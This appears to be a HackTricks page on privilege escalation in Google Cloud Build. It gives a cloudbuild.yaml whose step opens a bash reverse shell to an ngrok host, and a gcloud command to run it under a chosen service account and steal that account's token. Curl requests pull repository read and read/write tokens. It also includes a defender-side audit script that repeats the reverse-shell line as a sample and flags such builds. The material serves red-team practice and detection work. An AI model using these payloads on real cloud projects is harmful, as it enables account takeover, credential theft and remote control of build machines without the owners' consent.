GCP - Cloudbuild Privesc

Tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

cloudbuild

For more information about Cloud Build, check:

GCP - Cloud Build Enum

cloudbuild.builds.create, iam.serviceAccounts.actAs

With this permission you can submit a cloud build. The cloudbuild machine will by default have a token of the cloudbuild Service Account <PROJECT_NUMBER>@cloudbuild.gserviceaccount.com in its filesystem. However, you can indicate any service account inside the project in the cloudbuild configuration.
Therefore, you can make the machine exfiltrate the token to your server, or get a reverse shell inside of it and get the token yourself (the file containing the token might change).

Direct exploitation via the gcloud CLI

1- Create the cloudbuild.yaml and modify it with your listener data

Cloud Build YAML configuration for reverse shell

```yaml
steps:
- name: bash
  script: |
    #!/usr/bin/env bash
    bash -i >& /dev/tcp/5.tcp.eu.ngrok.io/14965 0>&1
options:
  logging: CLOUD_LOGGING_ONLY
```

2- Submit a simple build without source code, including the yaml file, and specifying the SA to use in the build:

Submit a Cloud Build with the specified service account

```bash
gcloud builds submit --no-source --config="./cloudbuild.yaml" --service-account="projects//serviceAccounts/@.iam.gserviceaccount.com"
```

Using the python gcloud library

You can find the original exploit script here on GitHub (but the location it’s taking the token from didn’t work for me). Therefore, check a script to automate the creation, exploit and cleaning of a vuln environment here and a python script to get a reverse shell inside the cloudbuild machine and steal it here (in the code you can find how to specify other service accounts).

For a more in-depth explanation, visit https://rhinosecuritylabs.com/gcp/iam-privilege-escalation-gcp-cloudbuild/
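From the defender's side, the pattern above (a build that names a non-default service account and runs a shell step that opens an outbound connection) is easy to flag when reviewing CreateBuild request bodies from Cloud Audit Logs or cloudbuild.yaml files in a repository. The following audit helper is an added example, not code from this page or from the linked repositories; the project number, project id and service account names in it are constructed.

```python
"""Added audit helper (not from this page or the linked repos): flag Cloud Build
requests that match the privesc pattern above, e.g. when reviewing CreateBuild
request bodies from Cloud Audit Logs or cloudbuild.yaml files in a repo."""
import re
from typing import Dict, List

# Constructed sample mirroring the YAML above; project and SA names are made up.
SAMPLE_BUILD = {
    "steps": [{
        "name": "bash",
        "script": "#!/usr/bin/env bash\nbash -i >& /dev/tcp/5.tcp.eu.ngrok.io/14965 0>&1\n",
    }],
    "options": {"logging": "CLOUD_LOGGING_ONLY"},
    "serviceAccount": "projects/example-proj/serviceAccounts/"
                      "high-priv-sa@example-proj.iam.gserviceaccount.com",
}

# The only network-shell indicator used here is the /dev/tcp idiom shown above.
OUTBOUND_SHELL = re.compile(r"/dev/tcp/")


def default_cloudbuild_sa(project_number: str) -> str:
    """Email of the SA a build runs as when none is specified."""
    return f"{project_number}@cloudbuild.gserviceaccount.com"


def audit_build(build: Dict, project_number: str) -> List[str]:
    """Return human-readable findings for one build config / request body."""
    findings: List[str] = []
    sa_field = build.get("serviceAccount", "")
    sa_email = sa_field.rsplit("/", 1)[-1] if sa_field else ""
    custom_sa = bool(sa_email) and sa_email != default_cloudbuild_sa(project_number)
    if custom_sa:
        findings.append(f"build impersonates non-default service account {sa_email}")
    logging_mode = (build.get("options") or {}).get("logging")
    if custom_sa and logging_mode in ("CLOUD_LOGGING_ONLY", "NONE"):
        # Custom-SA builds cannot use the default log bucket, so their output is
        # only in Cloud Logging (or nowhere); pull it from there when triaging.
        findings.append(f"custom SA with logging={logging_mode}: review Cloud Logging for build output")
    for idx, step in enumerate(build.get("steps", [])):
        blob = " ".join(str(step.get(k, "")) for k in ("script", "args", "entrypoint"))
        if OUTBOUND_SHELL.search(blob):
            findings.append(f"step {idx} ({step.get('name')}) opens an outbound shell via /dev/tcp")
    return findings


if __name__ == "__main__":
    for line in audit_build(SAMPLE_BUILD, "123456789012"):
        print("FINDING:", line)
```

Feed it the `build` object from each `google.devtools.cloudbuild` CreateBuild audit entry (or each parsed cloudbuild.yaml) and alert on any non-empty result; a build running as the default Cloud Build SA with a plain docker step produces no findings.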

cloudbuild.repositories.accessReadToken

With this permission the user can get the read access token used to access the repository:

Get the read access token used to access the repository

```bash
curl -X POST \
  -H "Authorization: Bearer $(gcloud auth print-access-token)" \
  -H "Content-Type: application/json" \
  -d '{}' \
  "https://cloudbuild.googleapis.com/v2/projects//locations//connections//repositories/:accessReadToken"
```

cloudbuild.repositories.accessReadWriteToken

With this permission the user can get the read/write access token used to access the repository:

Get the read/write access token for the repository

```bash
curl -X POST \
  -H "Authorization: Bearer $(gcloud auth print-access-token)" \
  -H "Content-Type: application/json" \
  -d '{}' \
  "https://cloudbuild.googleapis.com/v2/projects//locations//connections//repositories/:accessReadWriteToken"
```

cloudbuild.connections.fetchLinkableRepositories

With this permission you can get the repositories the connection has access to:

Fetch linkable repositories

```bash
curl -X GET \
  -H "Authorization: Bearer $(gcloud auth print-access-token)" \
  "https://cloudbuild.googleapis.com/v2/projects//locations//connections/:fetchLinkableRepositories"
```
